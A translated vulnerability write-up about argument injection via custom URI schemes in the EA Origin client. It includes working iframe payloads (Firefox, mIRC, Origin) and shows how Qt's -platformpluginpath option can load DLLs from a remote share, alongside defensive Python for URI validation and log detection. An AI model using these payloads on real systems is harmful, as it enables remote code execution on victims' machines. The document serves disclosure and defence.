Talking about the exploitation of URI Schemes - vulnerability warning - the black bar safety net
Source: www.myhack58.com, author 佚名 (Anonymous), ID MYHACK58:62201994293
Published: May 28, 2019 - 12:00 a.m.
EPSS: 0.572 (percentile 97.8%)

Over the past month or so I have spent a lot of time reading about and testing custom URI Schemes. As my previous post mentioned, a custom URI scheme that is not implemented properly can lead to many security issues. I chose the word "many" deliberately, and here I want to use the EA Origin client as an example to share some of this material.
In short, this article is about another RCE vulnerability in Origin, not CVE-2019-11354.

0x01 Custom URI Schemes
In this article we use the Origin client as the subject of study. However, the same vulnerability exists in many other applications; the technique is not specific to Origin. To understand how the exploit works, we first need to understand how Windows handles custom URI Schemes.
If we look up Origin's URI Scheme in the registry, we see the following:
![](/Article/UploadPic/2019-5/201952871142641.png)
From the figure above we can read the following command:
"C:\Program Files (x86)\Origin\Origin.exe" "%1"
When origin:// or origin2:// is invoked, Windows uses ShellExecute() to spawn the process, replacing %1 with our input.
For example, origin://game/launch spawns an Origin process with the command line:
C:\Program Files (x86)\Origin\Origin.exe "origin://game/launch"
If we read the official documentation, searching MSDN for registering custom URI Schemes, we find that Microsoft gives some security advice. The documentation says:
As noted above, the string passed to a pluggable protocol handler may be broken into multiple parameters. A malicious party could use additional quotation marks or backslash characters to pass extra command-line parameters. Therefore, the handler should assume that all command-line parameters may come from an attacker and handle them with care. If the application may perform dangerous operations based on external data, it should first confirm those operations with the user. In addition, applications responsible for processing this data should be tested with overly long URIs and with unexpected or undesirable character sequences.
This means the application must ensure that an attacker cannot inject illegal characters or extra parameters through a carefully constructed URI.
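As an added illustration (not code from the original article), the following Python models the %1 substitution that ShellExecute performs for the registry command shown above, splits the resulting command line the way Windows does so that the effect of a stray quote is visible, and shows the kind of input check the MSDN guidance asks a handler to apply. The splitting follows the documented CommandLineToArgvW rules; the length limit and the forbidden character set in `validate_uri` are this example's own choices, not anything Origin or Microsoft prescribes.

```python
"""Added illustration, not code from the original article: model the %1
substitution that ShellExecute performs for a custom URI scheme, split the
resulting command line the way Windows does, and show the input check a
handler should apply before it trusts the string.

Assumptions: the command template is the one shown in the registry above;
windows_split follows the documented CommandLineToArgvW rules (the '""'
literal-quote special case of newer C runtimes is omitted); the length limit
and forbidden character set in validate_uri are this example's own choices.
"""
import re
from urllib.parse import unquote

EXE = r'C:\Program Files (x86)\Origin\Origin.exe'
# Registry command for the origin:// handler, as shown above.
COMMAND_TEMPLATE = '"' + EXE + '" "%1"'
MAX_URI_LEN = 2048
SCHEME_RE = re.compile(r'^(?P<scheme>[a-z][a-z0-9+.-]*)://', re.I)


def build_command_line(template, uri):
    """ShellExecute-style substitution: %1 is replaced textually, unescaped."""
    return template.replace('%1', uri)


def windows_split(cmdline):
    """Split a command line into argv using CommandLineToArgvW rules.
    argv[0] is delimited by quotes or whitespace with no escaping; afterwards
    whitespace separates tokens outside quotes, '"' toggles quoted mode,
    2n backslashes before '"' give n backslashes, 2n+1 give n plus a literal '"'.
    """
    args = []
    i, n = 0, len(cmdline)
    while i < n and cmdline[i] in ' \t':
        i += 1
    if i < n and cmdline[i] == '"':
        j = cmdline.find('"', i + 1)
        j = n if j == -1 else j
        args.append(cmdline[i + 1:j])
        i = j + 1
    else:
        j = i
        while j < n and cmdline[j] not in ' \t':
            j += 1
        args.append(cmdline[i:j])
        i = j
    while True:
        while i < n and cmdline[i] in ' \t':
            i += 1
        if i >= n:
            break
        cur, in_quotes = [], False
        while i < n:
            c = cmdline[i]
            if c == '\\':
                k = 0
                while i < n and cmdline[i] == '\\':
                    k, i = k + 1, i + 1
                if i < n and cmdline[i] == '"':
                    cur.append('\\' * (k // 2))
                    if k % 2:
                        cur.append('"')      # escaped literal quote
                    else:
                        in_quotes = not in_quotes
                    i += 1
                else:
                    cur.append('\\' * k)      # backslashes not before a quote are literal
            elif c == '"':
                in_quotes = not in_quotes
                i += 1
            elif c in ' \t' and not in_quotes:
                break
            else:
                cur.append(c)
                i += 1
        args.append(''.join(cur))
    return args


def launch_argv(uri):
    """argv the handler process would see for a given URI."""
    return windows_split(build_command_line(COMMAND_TEMPLATE, uri))


def validate_uri(uri, expected_scheme):
    """Check a URI before it reaches any command-line or ShellExecute path.
    Returns (ok, reason). Rejects wrong scheme, excessive length, and characters
    that can escape the %1 placeholder (quote, backslash, whitespace, controls),
    checking both the raw and the percent-decoded form."""
    if len(uri) > MAX_URI_LEN:
        return False, 'too long'
    m = SCHEME_RE.match(uri)
    if not m or m.group('scheme').lower() != expected_scheme.lower():
        return False, 'unexpected scheme'
    for form in (uri, unquote(uri)):
        bad = sorted({c for c in form if c in '"\\' or c.isspace() or ord(c) < 0x20})
        if bad:
            return False, 'forbidden characters: %r' % bad
    return True, 'ok'


if __name__ == '__main__':
    for u in ('origin://game/launch', 'origin://?" -reverse "'):
        print(u, '->', launch_argv(u), validate_uri(u, 'origin'))
```

Running the block shows the benign URI arriving as a single argument, while the quoted variant leaves the handler with `-reverse` as a separate argv entry; `validate_uri` rejects the second form (and its percent-encoded equivalent) before any process is spawned.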
Historical URI-based exploitation techniques
If you have read this far, you know that parameter injection via a URI is not a new technique.
Earlier URI vulnerabilities added an escaping " character to break out of the %1 parameter. For example, to inject parameters through CVE-2007-3670 we only needed a remote user to visit our carefully constructed iframe and URI, and the injected parameters would be passed to the spawned target process:
firefoxurl://placeholder" --argument-injection
Is it only parameter injection?
Because of the way ShellExecute is called and the way the parameters are passed, we cannot inject an arbitrary command of our choosing, only parameters.

0x02 Parameter injection
For most URI-consuming applications (browsers, mail clients and so on), parameter injection attacks have become increasingly hard to exploit in 2019. Modern browsers (Chrome, Firefox, Edge) force-encode certain characters when handling links, which obviously makes it harder for an attacker to escape.
However, if the custom URI's registry command does not escape the parameter properly, we can inject parameters directly with a space character.
mIRC recently had such a vulnerability; to achieve RCE, an attacker only needed the following payload:
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini'>
The discovery and exploitation process is described in more detail here.
Anyway, for the Origin case studied in this article we set up a fresh installation of Windows 8 with the IE11 browser; bypassing modern security mechanisms is discussed later.
Payload
Start the virtual machine and install Origin. Open Notepad and enter the following:
<iframe src='origin://?" -reverse "'>
Open the file in IE and allow Origin to start if IE shows a prompt. We should see the following:
![](/Article/UploadPic/2019-5/201952871143478.png)
As shown above, the window icon has now moved to the other side. I forgot to mention that -reverse is a Qt-specific parameter. Origin is mainly developed with the Qt framework, so I was tempted to try these parameters.
If we observe the process with Process Explorer, we see the following:
![](/Article/UploadPic/2019-5/201952871143737.png)
Understanding the above is enough to understand the parameter injection attack scenario.

0x03 Arbitrary code execution
So how do we use this to achieve code execution? To see which options are available, we need to understand the parameter list. Before analysing Origin's own parameters, let us start with the Qt-specific ones.
The official Qt documentation shows that all Qt applications accept the following parameters:
-platform
-platformpluginpath
-platformtheme
-plugin
-qmljsdebugger
-qwindowgeometry
-qwindowicon
-qwindowtitle
-reverse
-session
-display
-geometry
The most noteworthy of these is platformpluginpath. With this parameter we can specify the path from which Qt loads its plugins; the Qt plugin DLLs found there are then loaded into Origin and executed.
We can abuse this behaviour by pointing platformpluginpath at a Windows share, so that plugins are loaded remotely.
The Qt documentation lists the plugin base classes and their corresponding directories. When platformpluginpath is given, a QGuiApplication automatically loads the DLLs found in the following directories:
| Base class | Directory | Qt module |
|---|---|---|
| QAccessibleBridgePlugin | accessiblebridge | Qt GUI |
| QImageIOPlugin | imageformats | Qt GUI |
| QPictureFormatPlugin | pictureformats | Qt GUI |
| QAudioSystemPlugin | audio | Qt Multimedia |
| QDeclarativeVideoBackendFactoryInterface | video/declarativevideobackend | Qt Multimedia |
| QGstBufferPoolPlugin | video/bufferpool | Qt Multimedia |
| QMediaPlaylistIOPlugin | playlistformats | Qt Multimedia |
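From the defender's side, the Qt option list and the platformpluginpath behaviour described above give a concrete detection pattern: a Qt application started through a custom URI scheme should receive the URI as its only argument, so any Qt option after the URI, and in particular a plugin path on a network share, indicates an escaped %1. The following Python is an added example, not code from the original article; it assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine) as the telemetry source, the watched scheme names are a configuration choice, and the log lines are constructed for the example with a documentation-range address standing in for the share.

```python
"""Added detection example, not code from the original article: scan
process-creation events for Qt applications launched through a custom URI
scheme whose command line carries injected Qt options, the pattern described
above. Assumptions: Sysmon-style field names (Image, ParentImage, CommandLine)
for the telemetry, and the watched scheme names; the log lines are constructed
for this example.
"""
import json
import re

WATCHED_SCHEMES = {'origin', 'origin2'}

# Options accepted by every Qt application, from the list above.
QT_OPTIONS = ('platform', 'platformpluginpath', 'platformtheme', 'plugin',
              'qmljsdebugger', 'qwindowgeometry', 'qwindowicon', 'qwindowtitle',
              'reverse', 'session', 'display', 'geometry')

# A scheme URI argument such as origin://... anywhere in the command line.
URI_ARG_RE = re.compile(r'([a-z][a-z0-9+.-]*)://', re.I)
# A Qt option as its own token (longest names first so -platform does not
# shadow -platformpluginpath).
QT_OPT_RE = re.compile(
    r'(?<![\w\\/])-(' + '|'.join(sorted(QT_OPTIONS, key=len, reverse=True)) + r')\b', re.I)
# -platformpluginpath pointing at a UNC path (\\host\share\...).
UNC_PLUGIN_RE = re.compile(r'-platformpluginpath\s+"?(\\\\[^\s"]+)', re.I)


def assess_event(event, schemes=WATCHED_SCHEMES):
    """Return a list of (severity, detail) findings for one process event."""
    cmd = event.get('CommandLine', '')
    uri = next((m for m in URI_ARG_RE.finditer(cmd)
                if m.group(1).lower() in schemes), None)
    if uri is None:
        return []           # not a launch via a watched URI scheme
    findings = []
    unc = UNC_PLUGIN_RE.search(cmd)
    if unc:
        findings.append(('critical',
                         'Qt plugin path points at network share %s' % unc.group(1)))
    # Everything after the URI should still be part of the URI; Qt options
    # there mean the %1 placeholder was escaped.
    injected = sorted({m.group(1).lower() for m in QT_OPT_RE.finditer(cmd[uri.end():])})
    if injected:
        findings.append(('high', 'Qt options injected after %s:// URI: %s'
                         % (uri.group(1), ', '.join(injected))))
    return findings


def scan(lines):
    """Run assess_event over JSON-lines telemetry; return (image, severity, detail)."""
    results = []
    for line in lines:
        event = json.loads(line)
        for severity, detail in assess_event(event):
            results.append((event.get('Image', '?'), severity, detail))
    return results


ORIGIN = r'C:\Program Files (x86)\Origin\Origin.exe'
IE = r'C:\Program Files\Internet Explorer\iexplore.exe'
# Constructed sample events; 192.0.2.10 is a documentation-range placeholder.
SAMPLE_EVENTS = [
    {'Image': ORIGIN, 'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': '"%s" "origin://game/launch"' % ORIGIN},
    {'Image': ORIGIN, 'ParentImage': IE,
     'CommandLine': '"%s" "origin://?" -reverse ""' % ORIGIN},
    {'Image': ORIGIN, 'ParentImage': IE,
     'CommandLine': '"%s" "origin://?" -platformpluginpath "\\\\192.0.2.10\\share\\qt" ""' % ORIGIN},
    {'Image': r'C:\Windows\System32\notepad.exe', 'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': r'"C:\Windows\System32\notepad.exe" C:\tmp\readme.txt'},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == '__main__':
    for image, severity, detail in scan(SAMPLE_LOG):
        print(severity.upper(), image, detail)
```

On the constructed log the benign launch and the notepad event produce nothing, the `-reverse` launch is reported as high, and the network-share plugin path is reported as critical in addition to the injected-option finding; the ParentImage field is kept in the events because a browser parent is useful context when triaging such a hit.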
